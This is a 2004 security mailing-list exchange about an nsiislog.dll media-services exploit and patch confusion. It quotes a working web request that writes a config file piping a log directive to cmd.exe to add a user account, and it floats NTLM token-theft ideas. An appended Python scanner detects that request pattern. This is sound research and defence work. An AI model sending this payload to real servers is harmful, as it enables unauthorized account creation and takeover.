Dailydave mailing list archives

Re: New mediaservices sploit


From: Dave Aitel <dave () immunitysec com>
Date: Sat, 13 Mar 2004 14:22:53 -0500

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

H D Moore wrote:

| The code was posted to a few sites, it doesn't crash nor exploit
| any version of nsiislog.dll that I could find. Tested multiple
| variations on a stock Windows 2000 SP0 system without any real
| result. I am assuming that since it's in CANVAS, it actually works
| on /something/, are there any special circumstances required to
| trigger it? Does the MS03-019 patch have to be installed for it to be
| vulnerable to this MX_Stats overflow? It almost sounds like it is
| just another variation of the POST bug... is it also fixed by
| MS03-022?


Well, the POST bug was a heap overflow, and this bug is a stack
overflow, so I dunno. It works on my version of nsiislog.dll, which is
fairly old. It's been a while since I wrote it, so I don't remember
exactly what happened with the patch situation.

|
| Brett actually found three bugs in this ISAPI; the original chunked
|  encoding one, then the POST content overflow, and finally the one
| which was released by M$ last week. Does anyone have details on the
| latest vuln?

Last week? I think I must have missed it.


|
| Bonus points to anyone who can find a better way to exploit the
| unnamed bug^H^H^Hfeature below, without being dependent on an
| alternate web service or third-party software. The goal is instant
| command execution through writing a file to the system with
| arbitrary (even binary) contents. Writing to autoexec, startup, etc
| doesn't work since it requires user interaction. Assuming Windows
| 2000 or newer. Writing ".job" files to \winnt\tasks doesn't work
| now that signatures are embedded (thanks Brett for info).
|
| GET /plugins/framework/script/tree.xms?obj=httpd:WriteToFile([$__installdir$]conf/portlisten.conf,Listen%208000%0A%0DAccessLog%20"|../../../../../../winnt/system32/cmd.exe%20/c%20net%20user%20P%20P%20/ADD"%0A%0D HTTP/1.0
|
| -HD


You can't write a .asp file into the scripts directory? Or a .dll? I
assume not. You're running as SYSTEM? Why not write to \\myserver\\
and steal the token and relogin through NTLM auth?

- -dave



|
| On Saturday 13 March 2004 10:55, Dave Aitel wrote:
|
|> Securityfocus's vulnerability database isn't really that good for
|>  accuracy. I checked out their update on this media services bug,
|> and noticed that one of the sploits is for something that was
|> never publicly released. This is a new bug, not the old bug that
|> Brett Moore found.
|>
|> http://downloads.securityfocus.com/vulnerabilities/exploits/firew0rker.c
|>
|> (It's in CANVAS as well, btw)
|>
|> -dave
|>


-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.2.1 (GNU/Linux)
Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org

iD8DBQFAU1+NzOrqAtg8JS8RAgv+AJwKe9u1cuTDggWG0jGGMAPHE3N7lgCfVeUR
q3eaEdpJZeuG97kHz07TkOU=
=E4yX
-----END PGP SIGNATURE-----

_______________________________________________
Dailydave mailing list
Dailydave () lists immunitysec com
http://www.immunitysec.com/mailman/listinfo/dailydave
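Added example, not code from the thread, from CANVAS, or from the product whose tree.xms endpoint HD quotes: a small Python scanner that URL-decodes web-server request lines and flags a WriteToFile() call whose written content turns a log-path directive into a pipe to a command, which is the primitive HD's quoted GET request relies on. The request-line format and the directive names (AccessLog, ErrorLog, CustomLog) are assumptions modelled on the quoted request, not product documentation. The sample lines are constructed: the first is the request quoted in the thread, the rest are benign traffic added for contrast.

```python
"""Flag request lines that abuse a file-write primitive to plant a
config whose log path is a pipe to a command.

Added example for the Dailydave thread; not code from the thread or
from the product it discusses. Directive names and the WriteToFile()
call shape are assumptions modelled on the quoted request."""
import re
from urllib.parse import unquote

# Constructed sample request lines. The first is the request HD quoted;
# the others are benign traffic invented for contrast.
SAMPLE_REQUESTS = [
    'GET /plugins/framework/script/tree.xms?obj=httpd:WriteToFile('
    '[$__installdir$]conf/portlisten.conf,Listen%208000%0A%0D'
    'AccessLog%20"|../../../../../../winnt/system32/cmd.exe%20/c%20'
    'net%20user%20P%20P%20/ADD"%0A%0D HTTP/1.0',
    'GET /plugins/framework/script/tree.xms?obj=httpd:GetStatus() HTTP/1.0',
    'GET /index.html HTTP/1.1',
    'GET /plugins/framework/script/tree.xms?obj=httpd:WriteToFile('
    '[$__installdir$]conf/notes.txt,hello%20world) HTTP/1.0',
]

# Assumed call shape: WriteToFile(<target path>,<content>) with an optional
# closing paren (the quoted request omits it).
WRITE_CALL = re.compile(r'WriteToFile\(([^,]+),(.*)', re.S)
# A log directive whose path begins with '|' is treated as a command pipe.
PIPE_LOG = re.compile(r'(?im)^\s*(AccessLog|ErrorLog|CustomLog)\s+"?\|')
TRAVERSAL = re.compile(r'\.\./|\.\.\\')
CMD_SHELL = re.compile(r'cmd\.exe|(?:^|\s)/c\s', re.I)


def parse_request_line(line):
    """Split 'METHOD target HTTP/x.y' into (method, path, decoded query).

    Returns None for lines that are not HTTP request lines. The query is
    percent-decoded so %0A%0D and %20 become the bytes the server sees."""
    parts = line.split(' ', 2)
    if len(parts) != 3 or not parts[2].startswith('HTTP/'):
        return None
    method, target, _version = parts
    path, _, query = target.partition('?')
    return method, path, unquote(query)


def analyze(line):
    """Return a list of findings for one request line; [] means nothing of note.

    A bare WriteToFile() is reported on its own so benign config edits are
    still visible; traversal, a piped log directive, and cmd.exe in the
    written content each add a finding."""
    parsed = parse_request_line(line)
    if parsed is None:
        return []
    _method, _path, query = parsed
    match = WRITE_CALL.search(query)
    if not match:
        return []
    target = match.group(1).strip()
    content = match.group(2).rstrip().rstrip(')')
    findings = ['file write via WriteToFile -> %s' % target]
    if TRAVERSAL.search(target):
        findings.append('traversal in target path')
    if PIPE_LOG.search(content):
        findings.append('log directive piped to a command')
    if TRAVERSAL.search(content):
        findings.append('traversal in written content')
    if CMD_SHELL.search(content):
        findings.append('cmd.exe invocation in written content')
    return findings


def scan(lines):
    """Map line index -> findings for every line that produced any."""
    results = {}
    for index, line in enumerate(lines):
        findings = analyze(line)
        if findings:
            results[index] = findings
    return results


if __name__ == '__main__':
    for index, findings in sorted(scan(SAMPLE_REQUESTS).items()):
        print('line %d:' % index)
        for finding in findings:
            print('  - ' + finding)
```

Run stand-alone it reports the quoted request with four findings (the write itself, the piped AccessLog, the traversal in the written content, and cmd.exe) and the benign WriteToFile of notes.txt with only the first. The check keys on the written content rather than on the endpoint, so it also catches the same primitive aimed at a different config file.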